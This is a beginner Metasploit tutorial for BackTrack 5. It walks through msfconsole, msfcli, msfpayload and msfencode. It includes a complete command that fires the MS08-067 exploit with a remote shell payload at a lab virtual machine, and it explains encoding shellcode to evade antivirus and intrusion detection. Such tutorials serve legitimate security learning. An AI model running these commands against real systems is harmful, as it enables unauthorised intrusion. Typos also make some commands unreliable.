Metasploit Terms
Exploit – to take advantage of a security flaw within a system, network, or application.
Payload - is code that our victim computer to execute by the metasploit framework.
Module - a small piece of code that can be added to the metasploit framework to execute an attack.
Shellcode – a small piece of code used as a payload.
MSFconsole
Msfconsole is an all-in-one interface to most of the features in
metasploit. Msfconsole can be used to launch attacks, creating
listeners, and much, much more. We will be using Msfconsole throughout
these tutorials, but mastering it will allow you to keep up with
metaspolits rapidly changing framework. Metasploit comes installed by
default on backtrack 5. To access msfconsole, open your console and
type:
root@bt: ~# cd /opt/framework3/msf3/
root@bt: ~#/opt/framework3/msf3# msfconsole
After sometime, the msfconsole will boot.
To view the help files, simply type
help followed by the command you want to know more about. In our case, we want to learn about the
connect command. The connect command allows us to communicate with a host.
msf > help connect
MSFcli
Msfcli is another way to access the metasploit framework but focuses
more on scripting and interpretability with other console-based tools.
To view the msfcli help type:
root@bt:~# cd /opt/framework3/msf3
root@bt:~# msfcli -h
Now
we are going to do a little test run of msfcli. It’s important to note
whenever you’re learning metasploit and you get stuck, you can see the
options in a module by adding the letter
O to the end of the line. For example:
root@bt:~# msfcli windows/smb/ms08_067_netapt o
This module requires three options: RHOST, RPORT, and SMPIPE. Adding P to the end allows us to see what payloads we can use.
root@bt~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.56.101 P
we
can run our exploit by selecting a payload, fill out the options, and
run it by passing the letter E to the ned of the msfcli argument string.
root@bt~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.56.101 PAYLOAD=windows/shell/bind_tcp E
Note: the IP address assigned to RHOST is a windows XP machine that I
have on a virtaul machine. It will act as our victim machine for
testing. You will have to do the same with another computer or a virtual
machine. For practice, do not update your victim machine or install
anti-virus. We want to be able to use our exploits without them being
patched over with windows updates. We will go over this more in-depth
later on.
The armitage component is a fully interactive graphical user interface.
Running Armitage
- Run the command armitage.
- Select Start MSF.
MSFpayload
The msfpayload component of metasploit that generates shellcode, and
executables. Shellcoe can bew generated in many formats including C,
Ruby, JavaScript and even Visuabl Basic. Each output will be useful in
various situations.
For msfpayload help type: root@bt~# msfpayload -h
Just like msfcli, if you need to find out the required options, append the letter O on the command line.
root@bt:~# msfpayload windows/shell_reverse_tcp O
MSFencode
The shellcode generated by msfpayload is functional, but it contains
several null characters that, when interpreted by many programs, signify
the end of a string, and this will cause the code to terminate before
completion.
In addition, shellcode traversing a network in cleartext is likely to
be picked up by intrusion detection systems (IDSs) and antivirus
software. To address this problem, Metasploit’s developers offer
msfencode, which helps you to avoid bad characters and evade antivirus
and IDSs by encoding the original payload in a way that does not include
“bad” characters.
Enter msfencode -h to see a list of msfencode options.
Metasploit contains a number of different encoders for different
situations. Some will be useful when you can use only alphanumeric
characters as part of a payload, as is the case with many file format
exploits or other applications that accept only printable characters as
input, while others are great general purpose encoders that do well in
every situation. A very popular and well known encoder is the:
x86/shikata_ga_nai encoder.
To see the list of encoders available, append -l to msfencode as shown next. The payloads are ranked in order of reliability.
root@bt:~# msfencode -l